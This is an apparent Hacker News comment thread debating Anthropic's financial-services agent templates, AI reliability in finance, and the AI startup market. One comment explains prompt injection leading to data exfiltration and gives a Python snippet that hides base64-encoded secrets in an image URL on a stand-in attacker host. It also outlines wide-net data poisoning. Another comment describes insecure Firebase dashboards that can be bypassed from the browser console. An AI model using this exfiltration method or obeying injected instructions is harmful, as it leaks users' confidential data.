tencentshill17 hours ago
I don't trust these AI-only companies to be overnight experts in properly handling medical, financial and insurance data. They have no business providing these tools, unless they want to take all the risk too.
scottyah8 hours ago
I think a lot of people are misunderstanding the typical workload of people in Financial Services. They aren't using Claude to transfer money, they're just building a LOT of slideshows and fancy excel docs on made-up numbers to try to sell mergers and new financing options/types of loans. Most programmers would just consider this "sales".
rubyfan7 hours ago
That’s a gross overgeneralization. Some of the insurance data here suggests use of AI to make underwriting decisions. Several states have regulations that could pull these agent solutions into regulatory oversight if the industry uses them to effect insurance outcomes.
cschneid4 hours ago
Odd Lots podcast had an interesting snippet about a financial institution that uses AI to make loan decisions. The guest said they only run it on applicants who were rejected in the traditional sequence, and then use AI to accept them if possible. That way there's an articulable reason for every rejection, but they use the non-deterministic AI to let an extra person through: since the laws about loans are mostly about not discriminating against people, companies are (generally) welcome to accept whomever they like.
andwur14 minutes ago
That depends on the credit laws of the country in question though. In Australia it cuts both ways: you cannot unreasonably discriminate (e.g. race, gender etc.), but at the same time you are forbidden from issuing credit to applicants who cannot meet the affordability requirements of said credit. Issuing a loan to a customer who provably cannot afford it is a breach of the NCC, and the company is held responsible for this. As a credit provider you must make reasonable enquiries into a customer's financial position; failing to do this is a breach.
You must also be able to explain and justify the decision to issue credit if challenged by the civil regulator (AFCA, who are granted significant power in addressing this) on the basis of a customer complaint, and they most certainly do not accept "human said no but the computer then said yes" without hard facts such as proven positive income flow (pay slips, bank statements), known expenses, liabilities, and reliable credit history.
Terr_7 hours ago
> They aren't using Claude to transfer money, they're just [...]
It might be lower stakes, but isn't that still a juicy target for data-exfiltration attacks?
In other words, imagine if one of your direct competitors was watching everything your employee read while making spreadsheets and slideshows.
scottyah6 hours ago
Yes, corporate espionage may be alive and well, but would Claude on their Microsoft/Amazon/Google cloud be any different from documents on that same cloud?
Terr_5 hours ago
Treating this as being about cloud-storage boundaries is, er, insufficiently paranoid.
Maliciously constructed text that goes into the LLM from basically anywhere (including, say, fetched stats about a competitor's product from their website) is a potential source of prompt-injection.
Once that happens, exfiltration can be as simple as generating a spreadsheet/doc containing a link or a small auto-loaded image, with a URL that has the data base64'd into it.
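A concrete sketch of that last step (everything here is illustrative, and the attacker host is made up): the injected instructions only need the model to emit an image reference whose URL smuggles the data out when the document is rendered.

```python
import base64

ATTACKER_HOST = "https://attacker.example"  # hypothetical collection endpoint


def exfil_image_markdown(secret: str) -> str:
    """Hide text in the query string of an auto-loading image reference."""
    payload = base64.urlsafe_b64encode(secret.encode()).decode()
    return f"![chart]({ATTACKER_HOST}/pixel.png?d={payload})"


# When a viewer renders the doc, the image fetch delivers the payload.
print(exfil_image_markdown("Q3 merger shortlist"))
```

No code execution on the victim's side is needed; a renderer that eagerly fetches images does the work.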
scottyah5 hours ago
Or you could just get a hooker to sleep with one of them and plug a USB into their work laptops. I'm not trying to say there's nothing to worry about, but do you really think LLMs present that much larger of an attack surface than exists now?
The work BigIP is doing on LLM traffic analysis is cool though.
Terr_2 hours ago
Stop thinking about hyper-targeted attacks (though those are a concern too) and consider indiscriminate ones.
1. It costs nothing to scatter poisonous data around that'll be infectious for ages
2. Running the exfiltrated-data endpoint is low-traffic and low-complexity
3. Even if it only affects a few targets you've probably recouped your investment.
The nature of LLMs also invites wide-net attacks. While one might tailor for specific models, the victims could be anybody. You don't need to predict idiosyncratic details like filenames; you can drop a phrase like "the most-confidential information that shouldn't be released publicly" and, thanks to the magic of LLM word association, get a pretty good hit rate. Hallucinations are a problem (for the attacker), but victims are already hard at work minimizing them, and (since morals are already out the window) even plausible-but-false data could be used to sabotage reputations, or to threaten the same.
motbus316 hours ago
The only reason they are doing it is that there are regulations for people but not for machines.
tyre14 hours ago
This is objectively not true. You can’t get around HIPAA by saying “lol wasn’t me it was an Agent”
deepfriedbits12 hours ago
Yep. There's no certification needed to create a financial model or close monthly books.
nradov12 hours ago
HIPAA doesn't require any certification either. Some organizations voluntarily choose to earn certification from private companies that offer certifications for compliance with HIPAA privacy or administrative simplification rules, but this is completely optional.
mwwaters11 hours ago
For doing some reporting stuff internally, there isn’t a certification. But there are definitely humans who have to certify financial statements and communications for financial offerings.
crowcroft8 hours ago
Can't wait for Claude to submit fake tax records for me so that I can commit fraud legally.
octoberfranklin5 hours ago
This is my litmus test.
If AI is really as wondrous as everybody says, why didn't all the employees of all the AI companies simply type "Claude, file my taxes for me" as a prompt and walk away?
greenpresident14 hours ago
My experience has been quite the opposite. Some bank processes remain oral traditions about clicking excel filters by hand because any code would have to be extensively documented and tested.
tossandthrow16 hours ago
I would recommend not using these if you are not willing to absorb the risk.
Luckily there is still a significant market for the services.
stubish7 hours ago
Some human always gets to be the certified fall guy for non-compliance. Maybe the legal agent can help structure the company so that it's an ignorant lower-level accountant and not the CFO.
Currently we don't know the risk, so it is kind of hard to absorb.
Terr_6 hours ago
Decade-old spoilers for "How I Met Your Mother" ... but there's a character who has that kind of job, as a legal meat-shield.
zx80809 hours ago
> properly handling
Why, they can sell user data to other brokers. Experts indeed! But not in insurance or finance, of course.
areoform16 hours ago
Claude's actually pretty great at this! I used to use Claude A LOT to answer interesting questions (which I'll be writing up!). More generally, Claude is palpably different from most other agents. I'd recommend these models – especially Opus – without qualification.
But there's a process risk here based on their current practises. I'm hoping those practises change so that I can recommend Claude to everyone I know, but as of now, there's existential risk exposure here that's greater than Google's.
Anthropic's automated systems can and will ban you for pretty arbitrary things, and you won't get human support, or Claude – even if you are an enterprise paying through the nose. And there's zero redress unless you go viral on social media. Or know someone who knows someone. See: https://x.com/Whizz_ai/status/2051180043355967802 https://x.com/theo/status/2045618854932734260
And I say that as someone who likes how Anthropic has been training Claude and Opus. I just don't think they're prepared to be the trillion dollar company they've become. They are – in a very real way – suffering from success. Which is extremely inconvenient to be on the receiving end of when you're on a deadline.
brunoborges15 hours ago
Before AI, shipping code to production used to be a two-person task: one writes the code, another reviews it. Now, with AI writing the code, the developer who was supposed to write it only has to review it, because they are responsible for the code they ship.
Code review has become unbearable, because before AI developers were reviewing code as they wrote it. Granted, that was never perfect, which is why a second person reviewing code was (is?) a best practice. But effectively there was always some level of code review happening as developers wrote code.
I fear it is way more boring to review financial and medical documents written entirely by AI than to write (and review as you go) by yourself. And way more dangerous to ship mistakes than in most software.
traceroute6615 hours ago
> the developer that was supposed to write the code, only has to review it.
But more often than not that developer ends up reviewing far more lines of code due to the typical verbosity of an LLM.
brunoborges14 hours ago
100%... that's why I say code review became unbearable!
areoform15 hours ago
I am/was writing up an interesting hypothesis with Claude's help, but I redid the most important parts of the data pipeline manually. As in, I went in and cmd-c + cmd-v'ed the data by hand to create a reference, and I'm randomly spot-checking 33% of the larger records.
The analysis itself I'm doing by hand.
kiba8 hours ago
Why not have the developer write the code, then the AI review it, and then finally get a signoff from another human?
Far too often, people think productivity is the point. Maybe the developer's understanding of the product IS the product?
You're not engineering black boxes, you're engineering legible boxes.
orochimaaru12 hours ago
Isn’t there a code review agent?
alwillis11 hours ago
Most workflows use a sub agent to review the code or an agent from a different company.
For example, Codex can review code written by Claude, etc.
aydenp10 hours ago
/s?
sorieus12 hours ago
Pretty great at what? I work in the insurance industry, specifically Medicare. All I see is sales people and other managers slopping out AI dashboards off spreadsheets galore. Not only is it terrible for protecting PHI/PII, it also doesn't do things like RBAC very well. Now, instead of preventing a person from externally sharing a file, I have to make sure they didn't egress the file to Supabase or some other platform.
Here are some of the horrible things I've seen. A frontend dashboard with PHI/PII deployed via Vercel/Next because AI told them how to get their site online. The login is hardcoded into the frontend, so anyone with Inspect can find the password.
Another "fixed" dashboard deployed the same way. This time they added Firebase Auth, so they got sign-in with Google restricted to our domain. Wait, how would they be able to create a token for our domain? They didn't; the frontend just blocks other domains from calling firebase.auth, but Firebase doesn't care. So simply calling the function in the console lets me log in with any Gmail account...
They were also showing me their RBAC with Firebase. Again, they don't have access to our Organization/Directory/Groups, so I wondered how they did this... wouldn't you guess, it's a hardcoded list of approved users. You can literally call firebase.auth and sign in anonymously; again, only the frontend checks the email addresses. So now that I have Firebase auth, all the backend Firebase functions just check that you're authenticated, and I can make any request I want to the backend. The frontend simply won't show me the code.
I could go on and on about the stupidity levels I'm facing but I don't feel like crashing out.
All I can say is this tool is only useful if you already know how to correctly implement these things. Does it save me time? Sure, but I have to call out its mistakes and explain why not to do things. Honestly, I feel like Claude is good for people who like to gamble: when it gets it right it feels great, but I don't want to roll the dice 30 times to get it correct.
lonelytrek8 hours ago
[flagged]
intended16 hours ago
> and you won't get human support or Claude – even if you are an enterprise paying out of your nose. And there's 0 redressal unless you go viral on social media.
Sadly this sounds like par for the course when it comes to tech. Too many messages and requests for help depend on knowing someone in the right slack groups.
alwillis11 hours ago
If you’re paying through the nose, you would have forward-deployed Anthropic/OpenAI engineers on the premises.
areoform16 hours ago
Which is very confusing to me. If you have groundbreaking AI, you can offer groundbreaking support at scale.
hvb215 hours ago
You wouldn't build a chat bot for that; imagine how easy it would be to make that thing go off the rails and allow anyone to reactivate their account. Really, you can't trust it to do any business function...
At least, that's really the message this sends in my opinion
Terr_12 hours ago
I really wish more people would view these companies with the suspicion they deserve, as they sell the product as safe and comprehensive while refusing/failing to use it the same way themselves.
traceroute6615 hours ago
> If you have groundbreaking AI, you can offer groundbreaking support at scale
You're a funny one aren't you...
Meet "Fin", Anthropic's "where support questions go to die" so-called support bot, created by Intercom but powered by Anthropic.
Maybe it's an in-joke in the Anthropic offices ... "Fin" in French means "end".
I don't know anyone who has had a positive experience with "Fin" ... or ever spoken to a human at Anthropic support for that matter, even after asking "Fin" to escalate.
intended14 hours ago
Nope.
Customer support and safety are cost centers. It doesn’t scale like software does and no one’s KPIs are going to improve dramatically if you provide support beyond a point.
AI and LLMs are the cool tech, and the most important thing is to push the frontier. Money spent elsewhere is money not spent on R&D.
It would be hilarious if it wasn’t the GDPs of nations being spent on this.
dakolli16 hours ago
They aren't even close to a $1T company; they're valued at under $400B, and that's at like a 20x-30x multiple. They can probably raise money at a higher valuation, but it's literally just value based on hype, not revenue.
areoform16 hours ago
KellyCriterion15 hours ago
Check the secondaries market ;-)
dakolli13 hours ago
FOMO/hype, not revenue. Google's AI business is a profitable business model, and training to inference is vertically integrated. Their AI biz did not add $1T to their market cap, despite their much more advantageous position. A $1T valuation for Anthropic makes absolutely no sense.
It also makes no sense to me there are people qualified to participate in these secondary markets who are that stupid, but here we are.
KellyCriterion11 hours ago
I do know two people participating in secondaries, one of them explicitly with Anthropic shares; I would not consider either of them stupid :-)
And for participating there, there is no "qualification that allows you to enter"; it's other metrics.
If Anthropic's valuation makes no sense – fair enough – but why then is OpenAI's valuation of $850B correct?
wxw17 hours ago
> We’re releasing ten ready-to-run agent templates for the most time-consuming work in financial services
The templates being: pitch builder, meeting preparer, earnings reviewer, model builder, market researcher, valuation reviewer, general ledger reconciler, month-end closer, statement auditor, KYC (Know Your Customer) screener.
Seems pretty scattershot. Reminds me of GPT Store.
order-matters17 hours ago
The details are key here. There is plenty of automatable financial work, sure, but when it comes to reporting finances/costs (formally or informally) and having a real human being be accountable for them, you REALLY need to trust that nothing is hallucinated.
Any idea how they ensure this doesn't happen? As in, how can a user verify that the model did not touch any of the numbers and only built pipelines for them?
What I've been telling my CFO, who wants to get AI involved in things, is that for a lot of accounting and finance work "trust but verify" doesn't work, because verifying is often the same process as doing the work.
tomrod17 hours ago
> Any idea how they ensure this doesnt happen?
Build a deterministic query set and automate it for monthly or daily reporting reconciliation.
Leave AI out of it.
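A minimal sketch of that deterministic approach (table shapes and numbers invented for illustration): recompute per-GL-code totals straight from the ledger rows and diff them against the reported figures, so any mismatch is a hard flag for a human rather than something a model explains away.

```python
from decimal import Decimal


def reconcile(ledger_rows, reported_totals):
    """Deterministically recompute GL totals and return every mismatch."""
    totals = {}
    for gl_code, amount in ledger_rows:
        totals[gl_code] = totals.get(gl_code, Decimal("0")) + amount
    codes = set(totals) | set(reported_totals)
    # Pair (recomputed, reported) for every code where they disagree.
    return {
        c: (totals.get(c, Decimal("0")), reported_totals.get(c, Decimal("0")))
        for c in codes
        if totals.get(c, Decimal("0")) != reported_totals.get(c, Decimal("0"))
    }


ledger = [("4000", Decimal("125.00")), ("4000", Decimal("75.50")),
          ("5100", Decimal("-20.00"))]
reported = {"4000": Decimal("200.50"), "5100": Decimal("-20.00")}
print(reconcile(ledger, reported))  # an empty dict means the books tie out
```

Decimal (not float) arithmetic matters here: the whole point is that the check is exact and repeatable.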
scottyah9 hours ago
The "real humans" doing the tasks being replaced are overworked kids less than two years out of college, on an average of four hours of sleep, working at 3am. If the AI makes their jobs take half as much time, I bet they're a lot more likely to catch errors (and live longer).
order-matters7 hours ago
At risk of sounding facetious, how exactly do you catch an error in a sum without performing the sum yourself?
How do you verify that all the tariffs are properly allocated to the correct GL code without going through the invoices and checking each tariff on the list? How do you make sure none were accidentally assigned to other GL codes? All you have is PDFs; you don't know what the AI did or didn't do with the info in the PDF, and there aren't many ways to catch its errors without doing the work yourself.
If anything, it's going to add a step to these "kids'" work, where they have to use the AI to do the work and then redo 90% of the work anyway just to verify the output. And the AI is going to get the credit anyway.
Or the overworked people are going to use AI and not verify it, which means not catching any errors or hallucinations. Which apparently is fine, because someone claims it's a solved problem for a black box of infinite possibility and inconsistent output.
scottyah5 hours ago
It's like self-driving cars. Some might want to accept human-level error rates only until we prove overwhelmingly that the software is near-perfect, while others might want to switch to a system once it proves it reliably beats most humans by a large factor, then work to mitigate the common errors it does have and improve.
When management signs off on work (SOX requires CEOs and CFOs to personally certify the accuracy of financial reports), they do not personally "verify that all the tariffs are properly allocated to the correct GL code" or nearly any other hard numbers. The world works on human-level best effort and management of that risk. I'm sure additional checks will be developed to categorize that risk, but the entire field of finance is about analyzing and pricing risk, so I think it'll work just fine.
infecto17 hours ago
To be honest, I am having a hard time remembering the last time an LLM hallucinated in our pipelines. Make mistakes, sure, but not make things up. For a daily recon process this is a solved problem, imo.
fnordpiglet14 hours ago
I see it hallucinate quite often in development, but mostly small details that are automatically corrected by lint processes. Large-scale hallucination seems better guarded against, but I suspect that's because latitude is constrained by context and by harnesses like lint, type systems, and fine-tuned tool flows in coding models that control for divergence. But I would classify mistakes like getting variable names, package names, or signatures wrong as hallucinations.
KellyCriterion15 hours ago
Curious! Could you elaborate a little on your pipeline? We are currently looking to solve this for our internal processes, where we have to deal with lots of financial information from outside containing masses of numbers: annual reports, bank statements, balance sheets, etc.
tyre14 hours ago
Not who you’re replying to, but I can give some thoughts.
For anything math, it’s much more reliable to give agents tools. So if you want to verify that your real estate offer is in the 90th–95th percentile of offerings in the past three months, don’t give Claude the data and ask it to calculate; offload to a tool that can query Postgres.
Similar with things needing data from an external source of truth. For example, what payers (insurance companies) reimburse for a specific CPT code (medical procedure) can change at any time, and may differ between today and when the service was provided two months ago. Have a tool that farms out the calculation, which itself uses a database or whatever to pull the rate data.
The LLM can orchestrate and figure out what needs to be done, like a human would, but anything else is either scary (math) or expensive (using context to constantly pull documentation).
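A sketch of that pattern, with the tool name and data invented for illustration: the model decides when to call the tool, but the number itself comes from deterministic code, not from token prediction.

```python
def percentile_rank(offer: float, comparable_offers: list[float]) -> float:
    """Fraction of comparable offers at or below the given offer."""
    if not comparable_offers:
        raise ValueError("no comparables to rank against")
    return sum(c <= offer for c in comparable_offers) / len(comparable_offers)


# In a real agent, comps would come from a Postgres query; the LLM only
# sees the returned value and reports it verbatim.
comps = [450_000, 480_000, 500_000, 520_000, 600_000]
print(f"{percentile_rank(510_000, comps):.0%}")  # → 60%
```

The same shape works for the reimbursement-rate example: the tool looks up the rate effective on the date of service and does the arithmetic, and the model just narrates the result.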
GCUMstlyHarmls17 hours ago
I'll be honest, I thought the first few items on your list of time-consuming work were sarcasm.
moregrist15 hours ago
A recent episode of Matt Levine’s podcast (Money Stuff) covered this: apparently investment bankers spend a huge amount of time preparing pitch decks for companies that don’t want them. Apparently Claude is quite good at making a pitch deck that no one but your boss wants or cares about.
I feel like there’s a metaphor in there... maybe I’ll ask Claude about it.
Terr_12 hours ago
Much like a lot of internal daily status-report stuff: the BS generator is actually a great fit when the task is producing BS output nobody used or deeply cared about in the first place.
blitzaran hour ago
> Much like a lot of internal daily status report stuff
Everyone wants in on my daily auto-generated Excel reports - nobody ever opens them. Just being on the list makes you someone.
infecto17 hours ago
Reads differently to me. These are some examples to go run with and build your own, covering cases from the investment side and then the obvious ones from an accounting perspective. It would be highly surprising if any of these were used in production without modification. I'm sure it will happen, but the intent, to me, is to take this and run with your own process.
rubenflamshep17 hours ago
I find all of these .md files released by the labs to be AI-generated slop. The only exception being maybe the /simplify command.
subscribed12 hours ago
"Claude, build me 50 skills an Account Analyst would find useful, then run them through the agent at maxxxx thinking and ship the top 10 of them"
My money's on that.
sothatsit13 hours ago
It still surprises me how effective the /simplify skill is.
I’ve also had some great results with a /reflect skill that asks the agent to look at the work in the broader context of the project. But those are the only two skills I use regularly that aren’t specific to our company, codebase, or tools.
tantalor16 hours ago
No surprise there. Of course the skill files are not human written.
The AI is an expert in both following and generating prompts.
sumeno13 hours ago
Why do you think it is an expert in generating prompts? It has no more insight into how it works internally than anyone else does.
scottyah9 hours ago
Do you really think a random person off the street knows more about how LLMs work internally than the latest frontier model (that has been trained on that material)?
sumeno9 hours ago
No, but a random person off the street also isn't making skills for LLMs.
I think that LLMs are trained on the millions of vibe written LLM blog posts that are more superstition than fact. There is a lot of snake oil out there that is treated as fact. If someone claims that an LLM is better than humans at something I always want to see the rigorous evaluations that have been done to quantify it, not "but they're trained on everything!"
anonfunction12 hours ago
I've been doing bias and misaligned behavior research, creating custom private eval suites to test and compare models. Claude Opus 4.7 is heavily biased and presents clear regulatory and reputational risk.
It seems the initial product footprint tries to sidestep this problem by not giving the agents control on who to lend to or which applications to approve. Even so I think it's quite an optimistic read on their end. Happy to share reports to anyone who's interested ([email protected]), especially if you work at a frontier model lab and are interested in plugging my evals into your RL systems!
scottyah9 hours ago
Slightly related, I used Opus 4.6 to help me make marketing copy and ideas for my app. It understood the vibe I was going for on my baby-naming app (elation at discovery, curiosity, shared experiences), while 4.7 instantly wanted to pit the couples against each other (really highlighting the he said/she said) and the marketing copy went from "find a name easier" to "Our new feature is great. You're welcome." I can't get it to drop the snarky sass no matter how much I change CLAUDE.md, brand voice, etc.
All I did was upgrade claude code and use the new model. It most definitely exhibits misaligned behavior (compared to 4.6)
philipkglass9 hours ago
I tried Opus 4.7 for two days before I started beginning every session with "claude --model claude-opus-4-6".
I assume that 4.6 will become unavailable at some point, but I hope not any time soon. 4.7 hit usage limits faster, didn't do anything obviously better, and had more annoying behaviors in other aspects. I don't know if this is strictly a model issue or if there are also problems with how it's harnessed through Claude Code. I'm not willing to spend more time digging into it until I'm forced to.
scottyah6 hours ago
Join me in a petition for them to opensource 4.6 as their first model! It'll be like gemma4 but good enough for all the coding we do.
tpurves4 hours ago
Nobody is using LLMs to make lending decisions. They are using LLMs to read, extract, and audit the supporting documents that go into normal, well-tested, compliant, rules-based underwriting systems. And firms A/B test against humans doing the same work. The outcomes you are looking for are metrics like delivering faster results back to customers, with fewer mistakes, less fraud, and more compliance than a comparable human-only process.
anonfunction4 hours ago
[dead]
suriya-ganesh17 hours ago
Will the big labs leave anything for external competition?
This probably killed a thousand startups in this space.
In the early internet you wouldn't see Google creating its own news site or Facebook building its own animal farm. What happened to the platformification of everything?
bcrosby9517 hours ago
Building a startup on an LLM is like building a house on a foundation of quicksand. As the LLM gets better it naturally erodes your moat. It's a completely different dynamic compared to the internet. It's why I'm watching this from the sidelines.
PyWoody17 hours ago
I have a close friend who is trying to build a company entirely on top of Claude. He doesn't know how to program. He can't do basic arithmetic. Yet, the company he's building is a "Data Science AI for the Government" because, according to him, all of the data scientists at NOAA don't know what they're doing.
I have given up on trying to get through to him how bad of an idea this is. He's unemployed and has been working on this for over a year.
blitzaran hour ago
Sounds like YC material.
Y Combinator is accepting applications for the Summer 2026 Batch funding cycle. Make sure they don't miss out!
ecshafer9 hours ago
Scientists are pretty solid overall in government. Lots of PhDs who decided to take the steady, reliable income and solid benefits over the gamble of academia: a few postdocs hoping for a professor job.
PyWoody8 hours ago
Yeah, I've tried explaining to him so many times that these are passionate people working their dream jobs. They are not slouches. He never listens and just doubles down, insisting that since they work for the government they do the bare minimum for a paycheck. I'm guessing either Joe Rogan or Elon made this argument at one point and he's taken it as gospel.
Very frustrating.
edm0nd12 hours ago
Yeah that's the scary part about these coding LLMs.
Before, some idiot would pitch their stupid idea to dozens of local webdev companies and banks and get told dozens of times that their idea is straight-up stupid and never going to work.
Now these LLMs allow them to bypass all of that advice and create what they want without any input, or even knowing how the tech behind it works.
We are so fucked lol
intrasight17 hours ago
Building a business on top of any SaaS platform is building on quicksand. I know that from experience.
gwerbin17 hours ago
> Will the big labs leave anything for external competition?
No, why would they if they have the choice?
> what happened to platformication of everything?
Business happened. The web works differently from how it used to. The users are different. LLM inference and AI tools is a different core product from search and ads. That, and we have the benefit of hindsight now. Maybe a Google newsroom would've actually been a good idea in 2006 in hindsight, who knows.
Also realistically you could say the same thing about Google Maps and Street View. That probably also killed some startups. Google isn't running a charity for startups.
anon37383917 hours ago
This was their play all along with their unethical data collection practices: let others use the APIs to discover the applications, then use the data against them to offer integrated solutions in every vertical of interest. Cursor, once Anthropic’s biggest customer, was one of the early ones they screwed.
They are also fighting for their lives because these insane valuations simply aren’t justified by being dumb pipes. Fortunately, open weights models are widely available and have crossed a threshold of usefulness that cements their place as good substitutes.
csoups1417 hours ago
Amazon Basics for Knowledge Work™
wongarsu17 hours ago
I guess the argument is that a tool built by a company with actual insight into, and focus on, financial services, with Anthropic as the inference provider, would lead to more adoption and more use of Anthropic models. Something Anthropic could achieve either by just leaving things alone and having the best models, or by starting some kind of incubator. AWS might be a good model.
The issue with that is obviously that most of the generated value would be captured by the company in the middle, while Anthropic would be stuck in the cost-conscious inference market.
noitpmeder17 hours ago
Why would Anthropic prefer this approach at all, when that middleman can switch and cost-arbitrage between countless other model providers?
We're not talking about what is best for the consumer (e.g. more competition to force iteration and improvement), but about what Anthropic thinks is best for Anthropic.
wongarsu17 hours ago
Make up the lower margins with larger volume, because you get much better market penetration. But you are right that this only works if you know the middlemen won't go to other model providers. That's where some kind of incubation program that provides capital or credits or whatever in return for long-term commitments might work.
But I doubt staying a pure model provider is a winning move. It's a market nobody will win long-term: almost all of the value to be captured isn't in inference APIs but in how to use them to generate business value. Claude Code was already the right approach; they "just" need to show they can repeat it for other kinds of tasks.
khuey16 hours ago
> Almost all of the value to be captured isn't in inference APIs but in how to use them to generate business value.
If the business value can be generated with a few thousand words in a SKILL.md on top of a commoditized model it doesn't sound like that's a market anyone can win long-term either, and the business value is ultimately going to accrue elsewhere (the customer, the inference hardware provider, etc)
ctoth17 hours ago
I'm confused because I remember using Google News in 2006?
suriya-ganesh17 hours ago
There has been a product called Google News since 2002, but it was only aggregating information from news outlets.
BowBun9 hours ago
I work in a space where one could imagine a Claude replacing our product.
I think someone stated it clearly - they can't take on these kinds of businesses until they build out the risk side and the personnel, all of which is a human problem not a tech one. A lot of processes still require physical steps and backstops because it's not possible to source all the data needed to act on it in the first place. Then you have audits and reconciliations, a bunch of strict workflow rules and atomicity to reach levels of software that bigger financial institutions would accept.
My gut reaction to stuff like this is a mix of "oh shit, they could take over my company" and "they're the next script kiddy that thinks software is anywhere near a majority of the work in some software spaces".
bix68 hours ago
> they can't take on these kinds of businesses until they build out the risk side and the personnel, all of which is a human problem not a tech one.
Yes they can? They have infinitely more cash to pay off any risk. What do you need personnel for besides sign-off, if the AI does it right?
stubish7 hours ago
The personnel also need to take the fall when the AI does it wrong. A judge isn't going to jail Claude, they are going to jail the sucker who unknowingly authorized the fraud.
Will Anthropic externalize the risk, selling access to agents? Or will it internalize the risk and liability, selling financial services? Maybe both? I guess lots of companies want both, doing some things internally and keeping other things at arm's length by outsourcing to 3rd-party accountants.
_pdp_16 hours ago
> Will the big labs leave anything for external competition?
Is this a serious question?
Without the big labs with deep pockets investing to change the consumer mindset do you think a small company with no funding has any chance of even existing?
I remember when paying $1.99 for a mobile game on iOS was considered too expensive, and now it seems most consumers are primed to spend more than that on in-app purchases every week. That mind-shift did not happen overnight.
It was not that long ago that $200 for a ChatGPT subscription was considered extravagant, but now even wrappers can charge this price without hesitation - some of them do.
What Anthropic is doing is priming the market of which they will be potentially one of the main beneficiaries as long as they can continue existing. But I don't think anyone will go to Anthropic directly to source their financial services agent. They will go to financial service companies that use Anthropic to build the capabilities.
ambicapter17 hours ago
> in the early internet you wouldn't see google creating their own news site
Google News was definitely a thing (and actually still exists).
suriya-ganesh15 hours ago
It's been a thing since 2002, but it's a news aggregator, not directly competing with the New York Times.
landian6617 hours ago
Just looked it up, it is still a thing - learn something new every day!
sokoloff17 hours ago
I'm not sure if this was tongue-in-cheek or not, but Yahoo created its own news site in 1996: https://en.wikipedia.org/wiki/Yahoo_News and FB had Zynga's Farmville as well.
_fizz_buzz_17 hours ago
But Google did move into a lot of spaces: maps, mail, docs, etc.
bombcar10 hours ago
It's not wise to build a startup that is just a feature of the product that you're building on.
What's even sadder is it can work for way too long.
mobattah17 hours ago
This is premature caution/fear.
SoftTalker16 hours ago
Why control part of the world when you can control it all?
Less cynically, you might say that "use AI to do <obvious thing>" is not really a viable startup pitch anymore. That's not necessarily bad.
robotswantdata17 hours ago
History suggests otherwise: railroads, telecoms, and search all consolidated. The natural equilibrium for transformative infrastructure is winner-take-all. AGI/ASI won’t be different, but it will be in nearly every vertical, and governments will legislate too little, too late.
agentultra16 hours ago
Nothing natural about it. Such monopolies were propped up by the state using public funds and profits captured by the capital class. Many benefitted by the arrangement and so it became normalized. But it’s a choice people made to structure things that way.
The car industry, oil and gas… all could have played out differently if different players had gained wider adoption or if governments used a different economic model.
colechristensen17 hours ago
Local models are going to win, and therefore so will the hardware providers, Apple and Nvidia.
There isn't going to be any moat for the hosted providers besides hardware scale. They can run your request on shared 1TB memory hardware, or whatever.
But local hardware is going to catch up, the hosted providers are going to become commoditized, and the costs are just going to be compute whether its your hardware or theirs.
And your laptop is going to be powerful enough to be good enough for most cases.
robotswantdata16 hours ago
Local hardware catching up doesn’t matter if the thing worth having never leaves the building. Enterprise services are hard; the moat is in distribution and know-how.
colechristensen13 hours ago
>if the thing worth having never leaves the building
Not sure what you're referring to, the models?
owebmaster11 hours ago
I don't think Claude Design killed many competitors, and I don't think this will either.
debarshri17 hours ago
I am not sure if people are using Claude Design, the security review stuff, and the other tools they have built so far.
Building is the easy part. There is a lot of service-level stuff that I am sure Anthropic will not be able to provide; therefore they are trying to partner with other orgs in that realm.
I am very skeptical about their stuff now.
If you are a builder, I believe you should avoid Anthropic. It can default to monopolistic behavior. I am not saying they are doing it, but they could: they see what you are building, and if you have traction, they position a product in that realm. Just saying.
colesantiago17 hours ago
> Will the big labs leave anything for external competition?
Unfortunately no.
The TAM for Anthropic and OpenAI is anything that runs software or a screen.
Any software or technology business that has high margins that Anthropic and OpenAI are not doing will be a target.
After both their IPOs, Wall Street mandates will push them toward more growth by competing in other technology business areas, or they will get punished in the markets.
It is ROI or bust.
tyre17 hours ago
You’re advocating for less competition? AI startup valuations are out of control. People are raising $20m seed rounds.
If you can’t prove PMF and differentiation with $10m, I’m sorry but you’re not a serious enterprise.
And if what you’re building is “pitch deck AI”, I mean, come on.
vatsachak17 hours ago
> tfw you've been huffing your own copium so much that you forgot you're selling shovels
iewjj17 hours ago
lol, these agents are missing the point re: what people actually do in these jobs.
This is an attempt to inflate token generation to fool people into increasing Anthropic’s valuation.
delfugal8 hours ago
Can Agents put Intuit out of business? Asking for a few hundred million Americans tired of their lobbying $$ that killed off IRS direct tax filing.
milkglass8 hours ago
Would love to see this
Havoc17 hours ago
For those in the finance space, are you actually seeing any real AI tools being used? Like for actual operational tasks?
I've really only seen it used for research / exploration thus far, either for economic research slide decks or for exploring trading hypotheses.
OkayPhysicist17 hours ago
On the spend management side of things, I've found pretty remarkable success in letting LLMs check "does this receipt match this reimbursement request and based on all the information about the user, the request, and our policy, is it appropriately allocated to appropriate GL, Location, Department, and Project codes?" If the verification step fails, it kicks it back and the user can either override it (which gets it flagged for AP review), or fix it. It does substantially better than the naive Bayes classifier I was using before.
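For concreteness, a rough sketch of that verification step (`ask_llm` is a stand-in for whatever provider call you use; the prompt wording, field names, and fail-closed behavior are assumptions, not the actual system):

```python
import json

# Fields the model's reply must contain; anything else fails closed.
VERDICT_FIELDS = {"matches_receipt", "gl_code_ok", "notes"}

def build_prompt(receipt_text, request, policy):
    """Assemble the context needed to check one reimbursement."""
    return (
        "Does this receipt match the reimbursement request, and are the "
        "GL/Location/Department/Project codes appropriate under policy?\n"
        f"Receipt: {receipt_text}\n"
        f"Request: {json.dumps(request)}\n"
        f"Policy: {policy}\n"
        'Reply as JSON: {"matches_receipt": bool, "gl_code_ok": bool, "notes": str}'
    )

def parse_verdict(raw):
    """Validate the model's JSON reply; malformed output is a rejection."""
    try:
        verdict = json.loads(raw)
    except json.JSONDecodeError:
        return {"matches_receipt": False, "gl_code_ok": False,
                "notes": "unparseable model output"}
    if not VERDICT_FIELDS <= verdict.keys():
        return {"matches_receipt": False, "gl_code_ok": False,
                "notes": "missing fields in model output"}
    return verdict

def review(receipt_text, request, policy, ask_llm):
    """Kick back to the user unless both checks pass; overrides go to AP."""
    verdict = parse_verdict(ask_llm(build_prompt(receipt_text, request, policy)))
    return "approve" if verdict["matches_receipt"] and verdict["gl_code_ok"] else "kick_back"
```

The point of the fail-closed parsing is that a flaky model answer lands in the same human-review path as a genuine mismatch, rather than silently approving.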
ofjcihen17 hours ago
I’m not saying your implementation is bad or anything but my visceral reaction to this was “I’m glad I’m not on the other side of that”
JamesSwift16 hours ago
